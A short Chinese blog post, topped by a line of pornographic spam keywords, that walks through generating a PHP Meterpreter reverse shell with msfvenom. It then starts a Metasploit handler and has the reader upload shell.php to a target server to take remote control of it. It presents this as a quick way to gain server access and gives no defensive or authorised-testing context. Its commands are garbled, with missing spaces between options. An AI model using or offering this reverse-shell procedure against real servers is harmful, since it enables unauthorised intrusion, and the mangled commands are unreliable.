欧美一区二区三区,国内熟女精品熟女A片视频小说,日本av网,小鲜肉男男GAY做受XXX网站

msfvenom php shell

趙雅婷1年前8瀏覽0評論

今天我們將會討論一個非常有用的工具——msfvenom php shell。這個工具可以幫助我們快速生成 PHP shell,在獲取服務(wù)器訪問權(quán)限時非常有幫助。這個工具的使用就像創(chuàng)建普通的 Metasploit payload,但添加進來了一些其他的選項。下面我們就來看看如何使用 msfvenom php shell 的示例。

msfvenom -p php/meterpreter/reverse_tcp LHOST=attackerIPLPORT=attackerPort-f raw -o shell.php

以上命令將會創(chuàng)建一個能夠與本機的 Metasploit 相連的 php shell。我將使用 192.168.1.2 作為攻擊者的 IP,端口設(shè)為 1234。

msfconsole -x "use exploit/multi/handler; set payload php/meterpreter/reverse_tcp; set LHOSTattackerIP; set LPORTattackerPort; run"

使用以上的命令來啟動 metasploit,如果一切都設(shè)置好了的話,你應(yīng)該會看到如下的結(jié)果。

[*] Started reverse handler on 192.168.1.2:1234 
[*] Starting the payload handler...

現(xiàn)在我們可以通過上傳生成的 PHP shell 文件到目標(biāo)服務(wù)器并在瀏覽器上訪問它來連接攻擊者的 Metasploit 會話。

http://localhost/shell.php

一旦你訪問了上傳的 PHP shell,你將有著 Metasploit 會話下的 Web Shell 權(quán)限,你也可以通過 Metasploit handler 向該目標(biāo)發(fā)送命令。

以上就是關(guān)于 msfvenom php shell 的全部內(nèi)容。這個工具非常方便、實用,并且還能夠快速讓您獲取服務(wù)器訪問權(quán)限。如果你還沒有嘗試過這個工具,強烈建議你趕緊學(xué)習(xí)并上手。

下一篇aphp